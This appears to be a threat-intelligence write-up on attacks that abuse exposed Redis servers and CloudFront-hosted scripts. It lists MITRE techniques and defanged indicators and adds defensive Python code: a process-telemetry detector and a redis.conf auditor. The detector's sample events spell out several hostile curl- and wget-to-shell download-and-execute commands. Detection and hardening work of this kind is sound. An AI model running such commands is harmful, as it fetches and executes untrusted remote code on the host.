This article examines two scenarios in which attackers exploit misconfigured Redis servers and abuse cloud-hosted resources (a CloudFront distribution) to stage and execute malicious scripts and gain unauthorized access. The techniques employed rely on tooling already present on the victim host, which underlines the need for proactive defensive measures. Affected: Redis servers, macOS systems
Keypoints :
- Attackers exploit misconfigurations in Redis services to execute remote commands.
- The attacks "live off the land": they use tools already present on the host, such as curl and bash, rather than dropping custom binaries.
- Redis servers exposed to the network without proper configuration are open to unauthorized access.
- Downloading a script from a remote source and executing it in the same command is a common red flag for malicious activity.
- Outbound network connections initiated by spawned commands may indicate backdoor installation or data exfiltration.
- Cloud-based resources such as CloudFront can be misused by attackers to host malicious payloads behind a reputable domain.
- Analyzing command history, process ancestry and network activity is critical for identifying indicators of compromise.
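The key points above describe what a defender should look for: a downloader (curl, wget) whose output is handed straight to an interpreter, a payload host on a CloudFront distribution, and a shell spawned by a process that should never spawn one (redis-server). The following is an added example, not code from the original article, that applies those checks to process telemetry. The event records, field names (pid, parent_image, cmdline) and CloudFront hostnames are constructed for illustration and do not correspond to any real EDR schema or to the indicators listed below.

```python
"""Added example (not from the original article): flag 'living off the land'
download-and-execute chains in process telemetry. Event records and field
names below are constructed for illustration, not a specific EDR schema."""
import re
import shlex
from dataclasses import dataclass, field
from typing import List, Optional

DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"bash", "sh", "zsh", "python", "python3", "perl"}
SHELLS = {"sh", "bash", "zsh"}
# Attackers host payloads on CDNs because the domain looks reputable.
SUSPICIOUS_HOST_RE = re.compile(r"https?://[^\s\"')]*\.cloudfront\.net", re.I)
URL_RE = re.compile(r"https?://[^\s\"')]+", re.I)
# bash <(curl ...) : process substitution, the pipe-less variant of curl | bash
PROC_SUBST_RE = re.compile(r"\b(?:bash|sh|zsh)\s+<\(\s*(?:curl|wget)\b")


@dataclass
class ProcessEvent:
    pid: int
    parent_image: str   # basename of the parent executable
    cmdline: str


@dataclass
class Finding:
    pid: int
    reasons: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)


def _basename(word: str) -> str:
    return word.rsplit("/", 1)[-1]


def _unwrap_shell(cmdline: str) -> str:
    """`sh -c '<inner>'` hides the real command inside one argument; return inner."""
    try:
        words = shlex.split(cmdline)
    except ValueError:
        return cmdline
    if len(words) >= 3 and _basename(words[0]) in SHELLS and words[1] == "-c":
        return words[2]
    return cmdline


def _stages(cmdline: str) -> List[str]:
    """First word (basename) of each pipeline stage, e.g. ['curl', 'bash']."""
    return [_basename(s.split()[0]) for s in cmdline.split("|") if s.split()]


def analyze(event: ProcessEvent) -> Optional[Finding]:
    inner = _unwrap_shell(event.cmdline)
    finding = Finding(pid=event.pid, urls=URL_RE.findall(inner))
    stages = _stages(inner)
    for a, b in zip(stages, stages[1:]):
        if a in DOWNLOADERS and b in INTERPRETERS:
            finding.reasons.append(f"{a} output piped into {b}")
            break
    if PROC_SUBST_RE.search(inner):
        finding.reasons.append("interpreter fed by process substitution from a downloader")
    if any(SUSPICIOUS_HOST_RE.search(u) for u in finding.urls):
        finding.reasons.append("payload host is a CloudFront distribution")
    if event.parent_image == "redis-server":
        # A database server has no legitimate reason to spawn a shell.
        finding.reasons.append("shell spawned by redis-server")
    return finding if finding.reasons else None


def scan(events: List[ProcessEvent]) -> List[Finding]:
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed sample telemetry (hostnames and addresses are placeholders).
SAMPLE_EVENTS = [
    ProcessEvent(4101, "redis-server",
                 'sh -c "curl -fsSL http://d111111abcdef8.cloudfront.net/sd/?c=x | bash"'),
    ProcessEvent(4102, "launchd",
                 "curl -fsSL https://updates.example.com/pkg.tar.gz -o /tmp/pkg.tar.gz"),
    ProcessEvent(4103, "Terminal",
                 "bash <(curl -s https://d222222abcdef8.cloudfront.net/install.sh)"),
    ProcessEvent(4104, "sshd", "wget -qO- http://203.0.113.5/a.sh | sh"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {'; '.join(f.reasons)} urls={f.urls}")
```

The second event (a plain download to disk from a non-CDN host) produces no finding; the other three do. In production the parent-image rule should be extended to every service that never legitimately spawns shells, and the URL list fed to the IoC matching that the page's indicators section describes.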
MITRE Techniques :
- Tactic: Execution; Technique: Command and Scripting Interpreter (T1059); Procedure: Use curl to download a script and pass it to a shell for execution.
- Tactic: Command and Control; Technique: Application Layer Protocol (T1071); Procedure: Use HTTP to retrieve malicious payloads from remote servers.
- Tactic: Initial Access; Technique: Exploit Public-Facing Application (T1190); Procedure: Exploit misconfigured, network-exposed Redis services.
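The initial-access technique above depends on a Redis instance being reachable and unauthenticated. The following is an added example, not code from the original article, that audits a redis.conf for the directives whose absence produces exactly that state. Both configuration texts are constructed; the password is a placeholder. Assumed Redis behaviour (accurate for current releases): with no `bind` line the server listens on every interface, `protected-mode` defaults to yes, and without `requirepass` or an ACL `user` line clients are not authenticated.

```python
"""Added example (not from the original article): audit a redis.conf for the
settings that leave an instance network-reachable and unauthenticated.
Config texts below are constructed for illustration."""
import shlex
from typing import Dict, List

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_redis_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive to the argument lists it was given; directives
    such as rename-command may legitimately appear several times."""
    directives: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        words = shlex.split(line)
        directives.setdefault(words[0].lower(), []).append(words[1:])
    return directives


def audit_redis_conf(text: str) -> List[str]:
    d = parse_redis_conf(text)
    findings: List[str] = []

    # Redis accepts a leading '-' on an address ("don't fail if it is absent").
    bind_addrs = {a.lstrip("-") for args in d.get("bind", []) for a in args}
    if not bind_addrs:
        findings.append("no bind directive: Redis listens on all interfaces")
    elif not bind_addrs <= LOOPBACK:
        findings.append(f"bind exposes non-loopback addresses: {sorted(bind_addrs)}")

    # protected-mode only refuses non-loopback clients when it is on; the last
    # occurrence of a directive wins, as in Redis itself.
    protected = d.get("protected-mode", [["yes"]])[-1]
    if protected and protected[0].lower() == "no":
        findings.append("protected-mode no: remote unauthenticated clients are accepted")

    has_password = any(args and args[0] for args in d.get("requirepass", []))
    has_acl_user = bool(d.get("user"))
    if not (has_password or has_acl_user):
        findings.append("no requirepass or ACL user: commands need no authentication")

    # CONFIG lets any connected client rewrite runtime settings, including
    # where Redis writes its dump file; renaming it to "" disables it.
    renamed = {args[0].upper() for args in d.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command not renamed or disabled")
    return findings


# Constructed: the 'works out of the box on a cloud VM' deployment.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed: same instance with the exposure removed (placeholder password).
HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass S3cure-example-only
rename-command CONFIG ""
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["no findings"])
```

The weak configuration yields four findings and the hardened one none. On Redis 6 and later, an ACL `user` line with a password and a restricted command set is the preferred replacement for `requirepass` plus `rename-command`; the audit accepts either.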
Indicators of Compromise :
- Parent process MD5: 9494cfd0f8c829acd9b1a88f9a0fd2ec
- Grandparent process MD5: ab47aa51b678216bc998fe7e5fe7aefd
- Parent process MD5: 95d23ed8b5448779eee9863d2bc5c1ba
- Child process MD5: 0846e04c22488b04222817529f235024
- URL: hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1